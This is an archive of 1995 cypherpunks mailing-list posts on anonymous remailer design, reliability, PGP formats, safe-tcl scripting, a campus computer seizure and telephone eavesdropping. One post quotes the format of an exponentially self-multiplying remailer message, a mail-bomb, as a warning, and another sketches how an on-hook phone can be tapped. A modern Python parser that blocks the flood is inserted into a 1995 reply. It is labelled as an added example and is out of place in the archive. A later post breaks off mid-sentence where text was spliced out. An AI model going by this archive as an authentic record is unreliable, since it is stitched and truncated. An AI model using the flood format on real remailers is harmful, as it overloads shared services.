iQCVAwUBLzEFkKfb4pLe9tolAQEtEAP/bxEHw+fwPaJJPyHaRRtuZqlxmzvEyD+w
5cmB9c75gzkY9SpSSLkbtawwUjCCiKynMAX76uSRaDRkVeTILelJ3gvdguRMS3Id
MYQI162mPvCN+lTvsMoXVJAdZzC14WE9JE0t9FC+ovYE8M+/yZ16EGEnvtWbnNYQ
pO8GkvNpR+g=
=n3fX
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: xpat%vm1.spcs.uma.thurman.edu@vm1.spcs.umn.edu
Date: Thu, 2 Feb 95 09:23:33 PST
To: cypherpunks@toad.com
Subject: Re: Frothing remailers, the advertising and pinging problems
Message-ID: <9502021723.AA10432@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


jrochkin@cs.oberlin.edu (Jonathan Rochkind) wrote:

>        ++Mail ping. Non-IP, simple, slow. ++
> A mail ping simply consists of sending a message to a remailer with a
> Request-Resending-To: yourself.  When you get it back, you know the
> remailer is alive.
> This has the advantage that it's hard for the remailer
> to trick you, even if it is an evil NSA remailer that wants you
> to believe it is alive, even though it really throws messages
> in the trash. It can't differentiate between your "ping"
> (to be returned) and a normal message (to be thrown in the trash).

Sure it can.

   if (message_origin==request-resending-to)
     forward_message;

To get around this you would have to chain, thereby relying on
an additional remailer. Of course your origin and resend addresses
could become different through net.sorcery, but to rely on
existing (and most likely transient) security loopholes are
unsound foundations to construct a persistent reliable remailer net.

Of course, clever Evil Remailer (tm) operatives might have their
machines work *most* of the time, and have more than one, so that
the entire network of remailers *seems* unreliable, or subtly mangle
encrypted messages so that the ball drops somewhere else.

----------------------------------------------------------------------
P M Dierking | "Emptiness is consistent with everything" --Nagarjuna




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Thu, 2 Feb 95 15:44:26 PST
To: cypherpunks@toad.com
Subject: Re: Remailer encryption module
In-Reply-To: <9502021508.AA28912@elvis.tamu.edu>
Message-ID: <199502021935.LAA07891@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Allan Bailey <allan@elvis.tamu.edu>

   [re: not using PGP for remailers]

   Isn't this what the forthcoming PGP RFC is about?  

Not to my knowledge.  As I understand it, they're just trying to
standardize a PGP format by documenting what the code can actually
handle and what was already planned into it.

   Also, what about the PEM "standard"?

PEM carries too much identification on the outside of the encryption
wrapper to be of good practical use against traffic analysis for
regular mail, much less remailer mail.

   Consider what CP did with his(her?) PGPTools kit.  As long as we have
   an agreeable dataformat "standard", the implementation becomes
   irrelevant.  

I expect someone to have a library come out that does the format.  The
format need not be very complicated.  Getting rid of all the key
distribution features makes a format much easier indeed.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Thu, 2 Feb 95 08:37:22 PST
To: Nobody@eniac.ac.siue.edu (Anonymous)
Subject: Re: How much entropy in a key press?
In-Reply-To: <199502021456.IAA01951@eniac.ac.siue.edu>
Message-ID: <199502021639.LAA15114@hermes.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


Shannon estimates roughly 1 bit per character of English.  

RFC 1750  D. Eastlake, S. Crocker, J. Schiller,
"Randomness Recommendations for Security" is probably useful.

Adam

| Can anyone tell me how many bits of entropy there are per 7-bit ASCII
| character.  More specifically, a program wishes to generate a session
| key by prompting the user to type N random key presses.  The characters
| entered are hashed down to 128 bits by MD5 for subsequent use as a key.
| 
| What should the value of N be, such that the entropy of the user's
| string does not unnecessarily exceed the entropy of the hash?
| 
| 

-- 
"It is seldom that liberty of any kind is lost all at once."
						       -Hume



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 2 Feb 95 08:53:15 PST
To: eric@remailer.net (Eric Hughes)
Subject: Re: Remailer encryption module
In-Reply-To: <199502021647.IAA07663@largo.remailer.net>
Message-ID: <9502021652.AA28840@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Eric Hughes says:
>    From: "Perry E. Metzger" <perry@imsi.com>
> 
>    > Once we get a data format, implementations will follow.
> 
>    The obvious data format is MIME's "Security Multiparts".
> 
> That's not a complete answer.  That's kind of the obvious package, but
> it addresses nothing of the interior.

It does specify the interior.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an158409@anon.penet.fi (beacher)
Date: Thu, 2 Feb 95 05:46:08 PST
To: cypherpunks@toad.com
Subject: computer underground digest stuff
Message-ID: <9502021305.AA25319@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



Date: Fri, 20 Jan 1995 00:13:29 -0600 (CST)
From: David Smith <bladex@BGA.COM>
Subject: File 1--ACM Computers Seized by IIT (fwd)

               ---------- Forwarded message ----------

ACM Computers Seized By Illinois Institute of Technology

  "And let it be known throughout the world what was done this day..."

Dateline January 17, 1995

Sometime before noon today, the Illinois Institute of Technology
seized the computer systems of the Association for Computing Machinery
student chapter at IIT.

700 Student and Faculty users are not happy.

And are now without their Email and other private files. The location
of the ACM systems is currently unknown, and the security of the
system and the accounts on it is highly questionable, as it was quite
literally ripped out of the wall (a piece of the modem was found
lying on the table).

The reasons given by IIT were that members of ACM are suspected of
hacking into the computer of another IIT student group, and pulling
several pranks.  The memo sent to the Dean of Students details the
hacking attempt, but no evidence points to ACM's systems or to any of
their users, but the memo does make several unbacked accusations. And
at this time, we can see no reason ACM would even be tied to the
events. However because ACM members are suspect, the systems were
unlawfully seized by IIT.

IIT has no legal right to seize ACM's systems, nor anyone else, as
they contain private accounts, files, and Email.  Such rights are
protected under the Electronic Communications Privacy Act (ECPA),
which extended most of the protections of the federal Wiretap Act
("Title III") to electronic mail.  Precedent was established in the case
Secret Service vs. Steve Jackson Games, decided March 12, 1993.

Needless to say, ACM members are not too happy about all of this.  And
the other 700 people don't seem happy either.

            ---------------------------------------------

Dateline January 18, 1995

   o Members realize that along with Troll, which is physically
     considered IIT's property even though it was purchased with student
     funds, property of ACM members was also seized including a
     network card, SIMM modules, and the modem that was broken by IIT
     during the seizure.

   o ACM receives written copy of allegations and supposed proof that
     ACM systems were used in the attempt. However the evidence
     clearly shows that other IIT owned systems were used and NOT
     ACM's systems.

   o Electronic Frontier Foundation is called and informed of the
     situation, and begins investigating the situation.

   o ACM HEARS THAT THE COMPUTER SYSTEM IS IN THE PROCESS OF BEING
     SEARCHED BY IIT STAFF, AND ACM MEMBERS NOW CONSIDER THE SYSTEM
     COMPROMISED. STILL NO EVIDENCE SHOWING ACM INVOLVEMENT.

   o Word continues to spread among the IIT community, many more
     students and faculty are outraged about the seizure of their
     accounts and files.

   o Continued stress to students due to the lack of access to their
     Email, addressbooks, and other files. Email is now being lost in
     mass due to the ACM systems removal, much of which is considered
     critical by many people.

   o ACM members miss the Chicago ACM meeting due to the fact that all
     the info concerning time/location was stored on the seized
     systems.

-------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
Due to the double-blind, any mail replies to this message will be anonymized,
and an anonymous id will be allocated automatically. You have been warned.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anthony Ortenzi <ortenzi@interactive.net>
Date: Thu, 2 Feb 95 10:18:38 PST
To: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Subject: Re: Fundamental Question?
In-Reply-To: <199502020400.XAA03916@libws2.ic.sunysb.edu>
Message-ID: <Pine.BSI.3.91.950202131351.27000B-100000@ns.interactive.net>
MIME-Version: 1.0
Content-Type: text/plain



I guess that I don't have any real idea about how much traffic goes 
through remailers, myself having only used anon.penet.fi, and even that 
only to reply to others who were anonymized...  anyone have any 
approximate statistics about traffic through other remailers?

And although I know it might be a pain, could there be simple encryption 
(read: fast) that could be implemented so messages could be doubly 
encrypted, the plaintext by pgp, and the pgp text by something else and 
have the identity of the recipient inside the second encryption, where 
each message coming in could be checked to see if it should be pgp decrypted?

Maybe using a simple hash of the recipient's name or other identifying mark?

					-Anthony

On Wed, 1 Feb 1995, Robert Rothenburg Walking-Owl wrote:

> Anthony Ortenzi wrote:
> > 
> > Although I understand the need for remailers for anonymity, is it not 
> > true that the whole idea of encryption (good encryption, that is) is that 
> > no matter who gets the encrypted text, it really doesn't matter?  Does 
> > this not mean that something like USENET is *perfect* for this?
> 
> Well, it's happened in the past. Doesn't mean Usenet is perfect for it,
> since nobody wants to sift through several thousand messages a day for
> messages encrypted to him/her.  Also, imagine all the traffic sent to a
> remailer duplicated on every site that carries that Usenet group...
> 
> Rob
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Perry" <perry@jpunix.com>
Date: Thu, 2 Feb 95 13:29:14 PST
To: alt.privacy.anon-server@myriad.pc.cc.cmu.edu
Subject: MX'ing and jpunix.com
Message-ID: <199502022127.PAA14199@jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


	JPUNIX.COM (soon to be alias.net) offers a MX service for
individuals that want to run an anonymous remailer but don't want the
domain they are operating from to be immediately apparent. By making
application to perry@jpunix.com, a remailer operator will be granted a DNS
MX record pointing to the domain address of the requestor's choice and 
will appear to reside in the jpunix.com (alias.net) domain. 

	Additional masking can be provided by having the MX record point
to myriad.pc.cc.cmu.edu. What good does this do? I have an agreement with
myriad.pc.cc.cmu.edu (Matt Ghio) where myriad will take the MX-pointed
record and additionally alias it through the smail daemon on myriad. This
function adds the unique benefit where determining the actual location of
the remailer in question will be foiled when using nslookup.  Since an
additional alias is performed the result of an nslookup will always point
to myriad. The actual location of the remailer remains hidden inside the
alias on myriad. Lastly, Matt has the EXPN function of his sendmail daemon
disabled so the identity of the remailer can't be determined by alias
expansion. 

	Future modifications to this scheme include adding an additional
step whereby the MX-alias process will cause a version of Raph Levien's
premail to post-process the message to add one or more random remailer
paths to the overall path that the message travels. This step is still in
the planning stages and has not been implemented yet. 

	If you have any questions, or want to set up an MX record, send
email to: 

perry@jpunix.com or ghio@myriad.pc.cc.cmu.edu

John Perry < perry@jpunix.com>


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLzFN6lOTpEThrthvAQHfAAQAkzoGHz7iaJKHMzB5GEQr8OvEwhDY0F9s
lCZUJhTw3KV2hVWDoUtZNPwiSf4vcsDhGx0CDQrDUon2vXC0mOHj4zBbDhhuUD5l
/NCPOmtWKFSnWiny2JbD0esNIuxIaWfa/tVTkDoDq/zPtsG0awmHTpGMSeIkkxvy
II1mDwnZ9n0=
=2jQD
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 2 Feb 95 16:15:01 PST
To: cypherpunks@toad.com
Subject: Remailing in safe-tcl
Message-ID: <199502030014.QAA22049@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Suppose someone runs safe-tcl to process incoming mail, and supports the
"delivery-time" mode, where incoming mail programs are executed as soon
as they arrive.  (Support for this mode doesn't really exist yet, but
I am putting together a simple script to enable it.)  Here then is an
example of how a self-remailing message might look:

[Other headers]
Content-Type: multipart/enabled-mail; boundary="----- =_791623442"
Content-ID: <2269.791623082.4@cryo>

------- =_791623442
Content-Type: application/Safe-Tcl; version="7.3"; evaluation-time=delivery
Content-ID: <2269.791623082.2@cryo>

# Get the other sub-part of this message and send it to the desired address
SafeTcl_sendmessage -to hfinney@shell.portal.com \
        -subject {Remailed message} -body [SafeTcl_getbodyprop 1.2 all]

------- =_791623442
Content-Type: text/plain
Content-ID: <2269.791623082.3@cryo>

This is the body of the message, which will get remailed.  It could be
a PGP message if the server supported automatic decryption of incoming
PGP mail.  Then it could have nested remailing instructions in it.

------- =_791623442--


This is a MIME format message with two sub-parts.  The first is the
script which gets run on delivery, and the second is the "payload", the
message to be remailed.  The script is a simple one-liner which sends
the second subpart to my email address.

Safe-Tcl does allow (rather vaguely) for automatic decryption of incoming
mail, as well as authentication (so you might allow messages signed by
certain people to get access to some special functions).  There is a
rudimentary mechanism for communication between scripts and server, and
(I think) among scripts themselves, with SafeTcl_getconfigdata and
SafeTcl_setconfigdata.  These let you put in {key, value} pairs that
other scripts can read.

I don't see any straightforward way for a script to suspend itself and
re-activate on some future event (such as the arrival of another
message).  Maybe it could put its whole self into the config database as
a {key, value} pair and rely on future messages to pull it out and
execute it.  But that doesn't seem too great.

There is a lot of interest in this notion of mail messages as scripted
agents which go zipping about the network gathering data which they send
home.  I am optimistic that we will be able to get remailing capabilities
out of this infrastructure largely for free.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Luis Agustin Perez  <lperez@oswego.Oswego.EDU>
Date: Thu, 2 Feb 95 13:27:56 PST
To: CYPHERPUNKS@toad.com.
Subject: info
Message-ID: <Pine.3.89.9502021627.A17221-0100000@cloy.oswego.edu>
MIME-Version: 1.0
Content-Type: text/plain


I recently read an article in HT magazine called cyberbucks. I was 
wondering if you could send me some information on the topic of the 
article.

thanx




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew J Ghio <mg5n+@andrew.cmu.edu>
Date: Thu, 2 Feb 95 14:11:13 PST
To: cypherpunks@toad.com
Subject: Re: null
In-Reply-To: <199501311018.EAA01333@rebma.rebma.mn.org>
Message-ID: <UjAJVAi00WDJ4bQUw3@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


nobody@rebma.rebma.mn.org wrote:
> The current status of this is that I get the remailed receipt, but the
> message never shows in the group.  Is mail2news@demon.co.uk down?

Yes.

Try using mail2news@news.demon.co.uk or mail2news@myriad.pc.cc.cmu.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@myriad.pc.cc.cmu.edu (Anonymous)
Date: Thu, 2 Feb 95 14:56:26 PST
To: cypherpunks@toad.com
Subject: Remailer Unreliability
Message-ID: <m0raAVp-000vl1C@myriad.pc.cc.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


What if it was possible to specify an alternate remailer?  In the case that
a remailer went down, you could specify an alternate.  For example:

::
Anon-To: remailer@foo.com
Alternate-To: remailer@bar.com

::
Encrypted: PGP

---pgp msg---

If foo.com was down, the message would be delivered to bar.com instead.
The PGP message would have to be readable to both of them, so it would
decrease security, but reliability would be better, especially for
reply blocks.  Comments?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 2 Feb 95 18:26:30 PST
To: cypherpunks@toad.com
Subject: Re:  Frothing remailers - an immodest proposal
Message-ID: <199502030225.SAA06856@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


One point re remailer reliability:  Even though in my discussions with
Nathan I did not really agree with his suggestion to have remailers check
signatures on incoming messages, actually Chaum did propose something
similar in his 1981 paper.

He would have each remailer sign the batch of messages it outputs each
cycle.  (Chaum's remailers used a straight batching approach.)  The idea,
as I recall, was to allow a remailer to prove that it had not engaged in
a denial-of-service attack by purposely dropping some message into the
bit bucket.  If some customer put his message in here and it didn't ever
come out over there, I guess the remailer could prove that it didn't lose
the message by showing its signed batch.  I'm not clear on the details
though.  Anyway, here is an area where message signing and reliability
have some intersection.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Gary Jeffers" <CCGARY@MIZZOU1.missouri.edu>
Date: Thu, 2 Feb 95 16:01:21 PST
To: cypherpunks@toad.com
Subject: The FIREWALL CHIP. U're phone always offhook?
Message-ID: <199502022357.SAA28764@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

         THE FIREWALL CHIP!  U'RE PHONE ALWAYS OFFHOOK?

   We have potential bugging devices in all our houses - The telephone!
Of course, when it is onhook, the microphone does not transmit... or
does it? Would the phone have to be rewired to render it always
"offhook" or would it be an operation at the central phone company?
If the present models would have to be rewired, then how about future
models? Much function is done thru chips & so could many of the models
on the current market be remote programmable? See the latest issue of
Mondo 2000.

   This problem demands a hardware solution. How about an adapter module
between microphone & the rest of phone?

                     THE FIREWALL CHIP

   The Clipper chip architecture was secret! Cypherpunks demand source
code with their security software! How about a demand for the "visible"
chip. That is - a chip with a known architecture - that can be tested
for integrity & is a general computer chip for doing software
operations & for doing i/o with electronic devices? With our property
being loaded up with sophisticated "trust me" electronics, it may be
necessary to have a general electronic "FIREWALL CHIP".

   The FIREWALL CHIP could have its applications software supplied by
various companies which would specialize in fields for
detecting electronic intrusion. Some specializing in phone audio, others
in vision telephones, cell phone tracking, & many others to be
considered.

   The FIREWALL CHIP will be a future necessity. It & its software
suppliers will probably constitute an outlaw industry.

                                         PUSH EM BACK! PUSH EM BACK!
                                         WWWAAAYYY  BBBAAACCCK!
                                         BBBEEEAAATTTT  STATE!

                                         Gary Jeffers
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLzFxYCoZzwIn1bdtAQG0ewF/RUMJZU1qXc+31XVQLfetSZst4j+S55/i
tq6j/JN5t3rjXa873mY5lT4cHCFBukfv
=NSeZ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Thu, 2 Feb 95 19:01:25 PST
To: cypherpunks@toad.com
Subject: Re: Remailer Unreliability
In-Reply-To: <m0raAVp-000vl1C@myriad.pc.cc.cmu.edu>
Message-ID: <199502030300.TAA10357@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


> Date: Thu, 2 Feb 95 18:00 EST
> From: nobody@myriad.pc.cc.cmu.edu (Anonymous)
> 
> What if it was possible to specify an alternate remailer?  In the case that
> a remailer went down, you could specify an alternate.  For example:

  Well, *I* think it is a good idea.  But how does remailer1 know that
remailer2 is both a remailer and down?

  Noyb




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Thu, 2 Feb 95 17:00:14 PST
To: Al Thompson <alt@iquest.net>
Subject: Re: "bad" government
In-Reply-To: <m0rZj0d-000E8pC@dorite.use.com>
Message-ID: <Pine.SUN.3.91.950202195912.3944C-100000@access3.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 1 Feb 1995, Al Thompson wrote:

> Date: Wed, 01 Feb 1995 12:31:20 -0600
> From: Al Thompson <alt@iquest.net>
> To: Charles Bell <quester@eskimo.com>
> Cc: cypherpunks@toad.com
> Subject: Re: "bad" government
> 
> 
> >> If strong government resulted in liberty and freedom, then the
> >> most intrusive, all-encompassing governments would result in 
> >> its citizens having the most liberty.  Is this the case?  I would
> >> look at the (former) Soviet Union, Iran, Cuba, East Germany, etc., 
> >> for your answer.
> 
> >Unrestricted individual freedom leads to unrestricted freedom of 
> >`private' corporations.  Private corporations uncurbed by society's law are 
> >autarkies: internally totalitarian, externally predatory, as amoral as 
> >amoebas.
> >
> >Is this the shape of the future you seek?

Yes, organization by choice, not by design.

> You can NOT restrict someone's rights simply because they MIGHT harm another 
> (prior restraint).  If they do cause actual harm to someone, they should be 
> brought to justice.  To place restrictions on someone based on the 
> possibility that they may cause harm introduces restrictions based solely on 
> the authorities' opinions (political philosophy, religion, race, etc).

Precisely.

>  
> Is that the shape of the future YOU seek?
> ************************************************************
> *           Just your basic signature block                *
> *                                                          *
> *  Al Thompson                                             *
> *  Fidonet 1:231/110                                       *
> *  alt@iquest.net                                          *
> ************************************************************
> 
> 

073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Thu, 2 Feb 95 18:01:19 PST
To: cypherpunks@toad.com
Subject: Re:  Why encrypt intra-remailernet.
Message-ID: <Pine.3.89.9502022036.D23979-0100000@vern.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


>We had some concerns here a while back that someone was trying to exploit
>such a feature to create an exponentially-growing message that would
>totally overload the remailers.  A message of the form:
>
>::
>Request-Remailing-To: <list of remailers here>
>
>::
>Request-Remailing-To: <list of remailers here>
>
><repeat about 20 times>
>
>was sent.  If all remailers had observed and honored the multiple
>requests, there would have been uncounted trillions of messages flying
>about.  So I would caution anyone considering implementing this feature.
>
>Hal
 
Was this Detweiller's "exponentially growing message"?
Note that requiring pgp wrappers kills this...
 
Nathan
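
An added example, not code from any of the posters or from a real remailer: a
parser for the "::" header blocks shown in this thread, with a fan-out cap that
refuses the multi-recipient message Hal describes and a single-copy failover
for the proposed Alternate-To header.  This is a different guard from the PGP
wrapper requirement Nathan mentions.  The comma-separated recipient list, the
function names, the is_up callback and the example.invalid addresses are
assumptions.

```python
"""Added illustration: '::' header blocks, a fan-out cap, Alternate-To failover."""

RECIPIENT_HEADERS = ("request-remailing-to", "anon-to")


def parse_blocks(message):
    """Return (header dicts from the leading '::' blocks, remaining payload)."""
    lines = message.splitlines()
    blocks, i = [], 0
    while True:
        while i < len(lines) and not lines[i].strip():
            i += 1                                   # blank lines between blocks
        if i >= len(lines) or lines[i].strip() != "::":
            break
        i += 1
        headers = {}
        while i < len(lines) and lines[i].strip():   # headers end at a blank line
            name, _, value = lines[i].partition(":")
            headers[name.strip().lower()] = value.strip()
            i += 1
        blocks.append(headers)
    return blocks, "\n".join(lines[i:])


def recipients(block):
    """Addresses a block asks to be remailed to (comma-separated: an assumption)."""
    for name in RECIPIENT_HEADERS:
        if name in block:
            return [a.strip() for a in block[name].split(",") if a.strip()]
    return []


def worst_case_copies(blocks):
    """Copies in flight if every hop honoured every listed recipient."""
    copies = 1
    for block in blocks:
        copies *= max(1, len(recipients(block)))
    return copies


def accept(blocks, max_fanout=1):
    """Policy gate: refuse a message if any block names too many recipients."""
    return all(len(recipients(b)) <= max_fanout for b in blocks)


def next_hop(block, is_up):
    """Primary recipient if reachable, else Alternate-To, else None.

    Only one address is ever returned, so failover never multiplies copies.
    is_up is a hypothetical reachability check supplied by the operator.
    """
    primary = recipients(block)
    if len(primary) != 1:
        return None
    for addr in (primary[0], block.get("alternate-to")):
        if addr and is_up(addr):
            return addr
    return None


# Constructed samples (addresses are placeholders).
REMAILERS = ", ".join(f"remailer{i}@example.invalid" for i in range(5))
FLOOD = ("::\nRequest-Remailing-To: " + REMAILERS + "\n\n") * 20 + "payload\n"
FAILOVER = ("::\nAnon-To: remailer@foo.com\nAlternate-To: remailer@bar.com\n\n"
            "::\nEncrypted: PGP\n\n---pgp msg---\n")

if __name__ == "__main__":
    flood_blocks, _ = parse_blocks(FLOOD)
    print("blocks:", len(flood_blocks))
    print("worst-case copies:", worst_case_copies(flood_blocks))
    print("accepted:", accept(flood_blocks))
    fail_blocks, _ = parse_blocks(FAILOVER)
    print("failover hop:",
          next_hop(fail_blocks[0], lambda a: a != "remailer@foo.com"))
```
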





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Thu, 2 Feb 95 18:03:03 PST
To: cypherpunks@toad.com
Subject: Frothing remailers - an immodest proposal
Message-ID: <Pine.3.89.9502022004.E23979-0100000@vern.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


 
kevin@elvis.wicat.com:
 
>Be gentle, though - it's my first time.
 
Here?  You jest.  ;)
 
>It seems to me that the current remailer web suffers a fundamental flaw.
>It is simply too static. When a remailer disappears, service is
>disrupted and messages are lost. Humans have to statically route their
>messages through the web either by hand or using relatively primitive
>tools such as the chain script (not to belittle the useful work that has
>been done, but it is by no means idiot proof yet). Basically, the
>current web of mailers shows nothing of the dynamic nature that has kept
>the internet alive and has offered us a decent chance at truly anonymous
>communications, nor is it easy to use to its full potential.
>
>Consider a more dynamic web of remailers. I envision remailers that
>actively advertise their presence on the web so that all active
>remailers are aware of all other active remailers. This advertising is
>to have very low latency so that a new mailer can be known to the web
>within minutes (I will address the implementation of this later). Thus,
>remailers can constantly be appearing and disappearing without impact on
>the web as a whole (I refer to this dynamic web of remailers as a
>"froth"). Imagine also that remailers are allowed to dynamically perform
>the routing functions that are currently done statically offline (for
>reasons I will discuss shortly).
>
 
Some version of this discussion came up a few months ago, and I passed on
it then, but I think I've heard enough to comment now:
 
The remailers are based on an inherently different model than the InterNet.
Some of these differences, in fact, are crucial.
 
1) The InterNet is based on mutual cooperation/mutual trust.  Cypherpunks
   trust no one that they don't have to.
 
This is not just a result of our twisted psyche.  If we could trust
everyone, we wouldn't _need_ remailers.  Since we don't even know who is
whom out there, we avoid extending trust.
 
2) The InterNet is concerned first about reliability, and not at all about
   privacy.  The remailers are concerned first about privacy, and can leave
   reliability to the users, if need be.
 
There is nothing to prevent Alice and Bob agreeing to send each other ACK
statements, and retransmitting messages if they don't get the ACK.  There
has been some mention of remailers doing the same with each other, in an
attempt to improve net-wide reliability.  BTW, with T1, sending ACKs is not
unreasonable between remailers.
 
3)  From 1) and 2).  The remailers are heading towards mandatory PGP,
    possibly nested.  All InterNet messages are world-readable--although
    this may be changing as the model breaks down.
 
Again, this has to do with the intrinsic differences.
 
>The use of such transient routers implies allowing dynamic routing. If
>any given remailer may go down or move at any point, it is impractical
>to expect users to keep track of which are up at the moment and create
>static routes in the current manner. The only reasonable solution I have
>come up with is to allow the remailers themselves to choose routing,
>given that they have full knowledge of the current state of the froth.
 
Here we have the real head of the problem, as Hal so astutely points out:
in your model, if the first remailer is bad, the message is compromised.
If users encrypt to all remailers, they might as well encrypt directly to
mole@snakeoil.nsa.gov.  If they don't, they severely limit who can pick out
their messages.  In particular, they bypass transient remailers.
 
But that isn't all.  If the remailers pick the route, they are in a no
better state than the users.  Since the flushing attack requires remailers
to operate on ticks, with carryover, an hour delay per remailer is almost
minimal, until traffic really picks up.  So if some message routes through
four remailers, a minimum of four hour delay results.  In your case, this
could easily move between in/out of service modes.
 
 
>                 Think about the proposed extension to MixMaster to
>allow separate parts of a multi-part message to be routed separately,
>and consider whether you really want to have to do this by hand. I
>strongly suspect that most messages are currently routed via boilerplate
>scripts, which has to make the job of traffic analysis much easier for
>our good friend Eve.
 
Stupid is as stupid does.
 
 
>By the way, a brief rant on a related topic; people speak of not
>trusting remailers any further than necessary, while I am clearly
>suggesting granting more authority and trust to the remailers. This
>notion of not assigning trust is simply nonsense. When you send a piece
>of mail to a remailer, encrypted or not, you are assigning complete
>trust in that remailer to keep you anonymous and not to forward your
>mail to the NSA immediately.
 
NOT TRUE.  With proper use of encryption, you are trusting your first
remailer only to not reveal that you sent a message, and not to correlate
that message to the one it sends out.  With rational use of garbage running
two deep, you can even suffer this loss without significant harm.
 
 
>This does lead to a related problem, however; if we allow remailers to
>pop up at random and join in the froth, how do we know that Deitweiller
>won't set up a number of black hole remailers that take your mail and
>throw it away, disrupting the froth, or forward it to nphard@nsa.gov?
 
How indeed?  The reason we chain is because we _don't_ really trust our
first remailer--or any other.
 
>Fortunately, we already have the PGP web of trust model in place and can
>use it to good effect in this case. Remailers should simply not route
>mail through any remailer whose public key is not trusted unless
>explicitly ordered otherwise. This ring
remailers to the user--with an exception list for those not "live".
 
Nathan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Thu, 2 Feb 95 17:23:58 PST
To: eric@remailer.net (Eric Hughes)
Subject: Re: Remailer encryption module
In-Reply-To: <199502021444.GAA07493@largo.remailer.net>
Message-ID: <9502030123.AA02022@josquin.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> I agree.  PGP just does not have the support for the encryption
> required for mixing remailers.  These deficiencies have been known for
> about two years at this point and still nothing has happened.  I
> expect this not to change anytime soon.

Hmm -- I clearly haven't been reading this thread close enough!  How
is PGP deficient?  What do you need PGP to do in order to get it to
work right with remailers?  I've never seen a bug-report/ feature
request of this sort sent to pgp-bugs@mit.edu, so clearly no one
considered this for the MIT PGP release.

So, what does PGP need to be able to do?

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daleh@ix.netcom.com (Dale Harrison (AEGIS))
Date: Thu, 2 Feb 95 20:44:04 PST
To: cypherpunks@toad.com
Subject: Re: The FIREWALL CHIP. U're phone always offhook?
Message-ID: <199502030441.UAA17143@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


You wrote: 

>>    We have potential bugging devices in all our houses - The telephone!
>> Of course, when it is onhook, the microphone does not transmit... or
>> does it? 
>
>The Mondo article ("Total Surveillance" by Charles Ostman) was a joke.
>
>From the inaccuracies in what I do know about, I assume all of the
>phone-paranoia is also unjustified.

Actually, there is a germ of truth in this.  On older phones (don't know if 
this works on newer electronic phones) when the handset is 'on-hook' a 
switch opens and breaks the voice circuit.  This of course only works for 
DC circuits.  If you drive that same circuit with an AC signal (from 
further up the line) then that 'open' switch becomes a capacitor and acts 
as a band-pass filter.  Signals from the mic will then modulate that AC 
current and can be extracted and reconstructed.  Supposedly the Dutch 
police have perfected this and use it in investigations to circumvent legal 
restrictions on physically bugging suspects' homes; or so was alleged a 
couple of years ago during a narcotics trial in Amsterdam.

Dale H.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Date: Thu, 2 Feb 95 18:04:17 PST
To: CCGARY@MIZZOU1.missouri.edu (Gary Jeffers)
Subject: Re: The FIREWALL CHIP. U're phone always offhook?
